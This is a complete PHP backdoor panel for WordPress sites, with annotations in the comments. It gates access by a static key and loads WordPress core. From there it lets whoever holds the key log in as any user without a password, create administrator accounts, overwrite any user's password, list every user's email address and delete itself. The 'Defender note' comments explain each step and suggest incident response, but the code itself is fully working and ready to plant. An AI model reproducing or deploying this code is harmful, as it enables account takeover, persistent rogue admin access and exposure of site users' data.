<?php
// ───────────────────────────────────────────────
// Access gate: the only check is a static, single-character value in the
// query string (?key=x). It is not tied to a WordPress account, session or
// capability, and the denial message below discloses the expected value,
// so the gate provides no meaningful access control.
// Defender note: the value travels in the URL, so requests that pass this
// gate appear in web-server access logs with "key=x" in the query string.
// ───────────────────────────────────────────────
if (!isset($_GET['key']) || $_GET['key'] !== 'x') {
// Reply 403 and stop before any WordPress code is loaded.
http_response_code(403);
die('Access denied – use ?key=x');
}
// ───────────────────────────────────────────────
// WordPress bootstrap: locate wp-load.php and include it.
// Once wp-load.php is required, WordPress core functions are callable from
// this file; the handlers below rely on that to act on user accounts without
// passing through wp-login.php or any capability check.
// Defender note: a standalone PHP file that probes parent directories for
// wp-load.php is worth flagging during file-integrity review.
// ───────────────────────────────────────────────
$possible_wp_load = null;
// Candidate directories, probed in order: this file's directory, its six
// nearest ancestors, the document root, four fixed subdirectory names under
// the document root, and the directory of the executing script.
$search_dirs = [
__DIR__,
dirname(__DIR__),
dirname(__DIR__, 2),
dirname(__DIR__, 3),
dirname(__DIR__, 4),
dirname(__DIR__, 5),
dirname(__DIR__, 6),
rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/') . '',
rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/') . '/wordpress',
rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/') . '/wp',
rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/') . '/blog',
rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/') . '/site',
dirname($_SERVER['SCRIPT_FILENAME'] ?? __DIR__),
];
// The first directory that contains wp-load.php wins.
foreach ($search_dirs as $dir) {
// Skip empty entries (e.g. DOCUMENT_ROOT unset) and paths that are not directories.
if (empty($dir) || !is_dir($dir)) continue;
$candidate = rtrim($dir, '/') . '/wp-load.php';
if (file_exists($candidate)) {
$possible_wp_load = $candidate;
break;
}
}
// Fallback when the loop found nothing but wp-config.php sits in the parent
// directory: define ABSPATH there and point at wp-load.php beside it.
// NOTE(review): the parent directory was already probed by the loop, so the
// file_exists() re-check below looks like it will fail on this path — confirm.
if (!$possible_wp_load && file_exists(dirname(__DIR__) . '/wp-config.php')) {
define('ABSPATH', dirname(__DIR__) . '/');
$possible_wp_load = ABSPATH . 'wp-load.php';
}
// Include the loader, or stop with a plain-text error if none was located.
if ($possible_wp_load && file_exists($possible_wp_load)) {
require_once $possible_wp_load;
} else {
die("ERROR: wp-load.php NOT FOUND");
}
// Sanity check that the user API is available before the handlers run.
if (!function_exists('wp_get_current_user')) {
die("WP partially loaded but core functions missing.");
}
// ───────────────────────────────────────────────
// Authentication bypass ("one-click login"): issues a WordPress auth cookie
// for whichever user ID is supplied in ?login=, with no password, nonce or
// capability check. The action is triggered by a plain GET request.
// Defender note: the cookie is set through the normal WordPress API, so the
// resulting session looks like an ordinary login; deleting this file does
// not by itself end a session already issued. Response guidance: destroy
// all user sessions and rotate the auth keys/salts in wp-config.php.
// ───────────────────────────────────────────────
if (isset($_GET['login']) && is_numeric($_GET['login'])) {
$uid = (int)$_GET['login'];
// Resolve the target account; stop if the ID does not map to a user.
$user = get_user_by('ID', $uid);
if (!$user || !$user->exists()) die('User not found');
// Drop whatever session/cookie the browser currently holds.
wp_destroy_current_session();
wp_clear_auth_cookie();
// Become the target user for this request and set its auth cookie.
// Second argument true is the "remember" flag; the secure flag follows is_ssl().
wp_set_current_user($uid, $user->user_login);
wp_set_auth_cookie($uid, true, is_ssl());
// Land in the dashboard as the impersonated user.
wp_safe_redirect(admin_url());
exit;
}
// ───────────────────────────────────────────────
// Rogue administrator creation: a POST with action=create adds a new user
// and assigns it the 'administrator' role. The only precondition is the
// static key gate at the top of the file; there is no nonce or capability check.
// Defender note: the account is a normal row in the users table and remains
// after this file is deleted. During incident response, audit every
// administrator account and its registration date.
// ───────────────────────────────────────────────
$msg = '';
if (isset($_POST['action']) && $_POST['action'] === 'create') {
$u = trim($_POST['username'] ?? '');
$e = trim($_POST['email'] ?? '');
// The password is taken as submitted (not trimmed).
$p = $_POST['password'] ?? '';
$err = [];
// Minimal input checks: length limits, email syntax, uniqueness.
if (strlen($u) < 3) $err[] = 'Username too short';
if (!is_email($e)) $err[] = 'Invalid email';
if (strlen($p) < 6) $err[] = 'Password too short';
if (username_exists($u)) $err[] = 'Username exists';
if (email_exists($e)) $err[] = 'Email exists';
if (empty($err)) {
$id = wp_create_user($u, $p, $e);
if (is_wp_error($id)) {
$err[] = $id->get_error_message();
} else {
// Promote the freshly created account to administrator.
(new WP_User($id))->set_role('administrator');
// The success banner reflects the plaintext password back in the response
// body (HTML-escaped), so it may also end up in any response capture.
$msg = '<div class="alert success">Admin user created successfully<br><strong>Login:</strong> ' . esc_html($u) . '<br><strong>Password:</strong> ' . esc_html($p) . '</div>';
}
}
// Any collected errors replace the banner; each message is HTML-escaped.
if ($err) {
$msg = '<div class="alert error">' . implode('<br>', array_map('esc_html', $err)) . '</div>';
}
}
// ───────────────────────────────────────────────
// Account takeover via password overwrite: a POST with action=reset sets a
// new password for the given user ID. The old password is not required and
// there is no nonce or capability check.
// Defender note: the change is written through wp_set_password(), so it
// persists after this file is removed. Every account on an affected site
// should be treated as needing a credential reset.
// ───────────────────────────────────────────────
if (isset($_POST['action']) && $_POST['action'] === 'reset') {
$uid = (int)($_POST['uid'] ?? 0);
$np = $_POST['newpass'] ?? '';
// Only a positive ID and a 6+ character password are required; the code
// does not verify that the ID belongs to an existing user.
if ($uid > 0 && strlen($np) >= 6) {
wp_set_password($np, $uid);
$msg = '<div class="alert success">Password updated successfully for user ID ' . $uid . '</div>';
} else {
// The same message is shown when the user ID is missing or invalid.
$msg = '<div class="alert error">Password must be at least 6 characters long</div>';
}
}
// ───────────────────────────────────────────────
// Self-deletion: a POST with self_remove=1 unlinks this script from disk.
// Defender note: this removes the on-disk artifact only. Accounts created,
// passwords changed and sessions issued by the handlers above are unaffected,
// so a missing file is not evidence of a clean site. Rely on access logs,
// the users table and session data when scoping an incident.
// ───────────────────────────────────────────────
$self_remove_msg = '';
if (isset($_POST['self_remove']) && $_POST['self_remove'] === '1') {
// '@' suppresses the PHP warning if the unlink fails (e.g. permissions).
if (@unlink(__FILE__)) {
$self_remove_msg = '<div class="alert success">File has been successfully deleted.</div>';
} else {
$self_remove_msg = '<div class="alert error">Could not delete file. Check file permissions.</div>';
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Mr.X Private WP_Super Admin Panel V1 2026</title>
<meta name="robots" content="noindex, nofollow">
<style>
:root {
--primary: #1e40af;
--primary-dark: #1e3a8a;
--danger: #dc2626;
--success: #16a34a;
--light: #f9fafb;
--gray: #6b7280;
--dark: #111827;
}
* { margin:0; padding:0; box-sizing:border-box; }
body {
font-family: 'Segoe UI', system-ui, -apple-system, sans-serif;
background: linear-gradient(to bottom, #f3f4f6, #e5e7eb);
color: var(--dark);
min-height: 100vh;
line-height: 1.6;
}
.banner {
background: linear-gradient(135deg, var(--primary) 0%, var(--primary-dark) 100%);
color: white;
padding: 1.5rem 2rem;
text-align: center;
box-shadow: 0 4px 12px rgba(0,0,0,0.15);
}
.banner h1 {
font-size: 1.8rem;
font-weight: 600;
letter-spacing: 0.5px;
}
.container {
max-width: 1200px;
margin: 2rem auto;
padding: 0 1rem;
}
.card {
background: white;
border-radius: 12px;
box-shadow: 0 4px 20px rgba(0,0,0,0.08);
overflow: hidden;
margin-bottom: 2rem;
}
.card-header {
background: var(--primary);
color: white;
padding: 1.25rem 1.75rem;
font-size: 1.25rem;
font-weight: 600;
}
.card-body {
padding: 1.75rem;
}
.form-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
gap: 1.5rem;
margin-bottom: 1.5rem;
}
.form-group label {
display: block;
margin-bottom: 0.5rem;
font-weight: 500;
color: var(--gray);
}
.form-group input {
width: 100%;
padding: 0.75rem 1rem;
border: 1px solid #d1d5db;
border-radius: 6px;
font-size: 1rem;
}
.form-group input:focus {
outline: none;
border-color: var(--primary);
box-shadow: 0 0 0 3px rgba(30,64,175,0.1);
}
.btn {
padding: 0.75rem 1.5rem;
border: none;
border-radius: 6px;
font-size: 1rem;
font-weight: 500;
cursor: pointer;
transition: all 0.2s;
}
.btn-primary { background: var(--primary); color: white; }
.btn-primary:hover { background: var(--primary-dark); }
.btn-danger {
background: var(--danger);
color: white;
}
.btn-danger:hover { background: #b91c1c; }
.alert {
padding: 1rem 1.25rem;
border-radius: 8px;
margin-bottom: 1.5rem;
font-weight: 500;
}
.alert.success {
background: #ecfdf5;
color: #065f46;
border-left: 5px solid var(--success);
}
.alert.error {
background: #fef2f2;
color: #991b1b;
border-left: 5px solid var(--danger);
}
table {
width: 100%;
border-collapse: collapse;
margin-top: 1rem;
}
th, td {
padding: 1rem 1.25rem;
text-align: left;
border-bottom: 1px solid #e5e7eb;
}
th { background: #f3f4f6; font-weight: 600; }
tr:hover { background: #f9fafb; }
.action-cell {
display: flex;
flex-wrap: wrap;
gap: 0.75rem;
align-items: center;
}
.login-link {
display: inline-block;
padding: 0.5rem 1rem;
background: #7c3aed;
color: white;
text-decoration: none;
border-radius: 6px;
font-size: 0.95rem;
}
.login-link:hover { background: #6d28d9; }
.footer-note {
text-align: center;
margin: 3rem 0 1rem;
color: var(--gray);
font-size: 0.9rem;
}
.self-destruct {
margin: 3rem auto 1rem;
text-align: center;
}
.self-destruct button {
padding: 1rem 2.5rem;
font-size: 1.1rem;
font-weight: 600;
}
@media (max-width: 768px) {
.banner h1 { font-size: 1.5rem; }
.form-grid { grid-template-columns: 1fr; }
}
</style>
</head>
<body>
<div class="banner">
<h1>Mr.X Private WP_Super Admin Panel V1 2026</h1>
</div>
<div class="container">
<?php /* $msg is fixed markup plus esc_html()-escaped strings or an integer user ID, built by the create/reset handlers; it is echoed raw. */ if ($msg) echo $msg; ?>
<?php /* $self_remove_msg holds one of two fixed strings set by the self-remove handler. */ if ($self_remove_msg) echo $self_remove_msg; ?>
<div class="card">
<div class="card-header">Create New Administrator</div>
<div class="card-body">
<form method="post">
<input type="hidden" name="action" value="create">
<div class="form-grid">
<div class="form-group">
<label>Username</label>
<input type="text" name="username" required autocomplete="off">
</div>
<div class="form-group">
<label>Email Address</label>
<input type="email" name="email" required autocomplete="off">
</div>
<div class="form-group">
<label>Password</label>
<input type="password" name="password" required autocomplete="new-password">
</div>
</div>
<button type="submit" class="btn btn-primary">Create Administrator</button>
</form>
</div>
</div>
<div class="card">
<div class="card-header">All Users</div>
<div class="card-body">
<table>
<thead>
<tr>
<th>ID</th>
<th>Username</th>
<th>Email</th>
<th>Roles</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php
// List the accounts returned by get_users(), ordered by ID, one table row each.
// The table shows usernames, email addresses and roles to anyone who passes
// the static key gate.
$users = get_users(['orderby' => 'ID']);
foreach ($users as $user) {
// Roles are flattened to a comma-separated string for display.
$roles = implode(', ', (array)$user->roles);
// Per-user link to the GET login handler, with the static key embedded.
// Defender note: following it leaves an access-log entry whose query string
// contains both "key=x" and "login=<user id>".
$login_url = "?key=x&login={$user->ID}";
// In the row below, the hidden "uid" field prints $user->ID without an
// escaping helper, unlike the other cells, which use esc_html()/esc_url().
?>
<tr>
<td><?= esc_html($user->ID) ?></td>
<td><strong><?= esc_html($user->user_login) ?></strong></td>
<td><?= esc_html($user->user_email ?: '—') ?></td>
<td><?= esc_html($roles ?: '—') ?></td>
<td class="action-cell">
<a href="<?= esc_url($login_url) ?>" class="login-link" target="_blank">Login as <?= esc_html($user->user_login) ?></a>
<form method="post" style="margin:0;">
<input type="hidden" name="action" value="reset">
<input type="hidden" name="uid" value="<?= $user->ID ?>">
<input type="password" name="newpass" placeholder="New password" required minlength="6" style="width:160px; padding:0.5rem;">
<button type="submit" class="btn btn-danger" style="padding:0.5rem 1rem; font-size:0.9rem;">Reset</button>
</form>
</td>
</tr>
<?php
}
?>
</tbody>
</table>
</div>
</div>
<!-- Self Remove Button -->
<div class="self-destruct">
<form method="post">
<input type="hidden" name="self_remove" value="1">
<button type="submit" class="btn btn-danger">SELF REMOVE THIS FILE</button>
</form>
<p style="margin-top:0.75rem; font-size:0.9rem; color:#666;">
This action cannot be undone
</p>
</div>
<div class="footer-note">
Private access only • V1 2026
</div>
</div>
</body>
</html>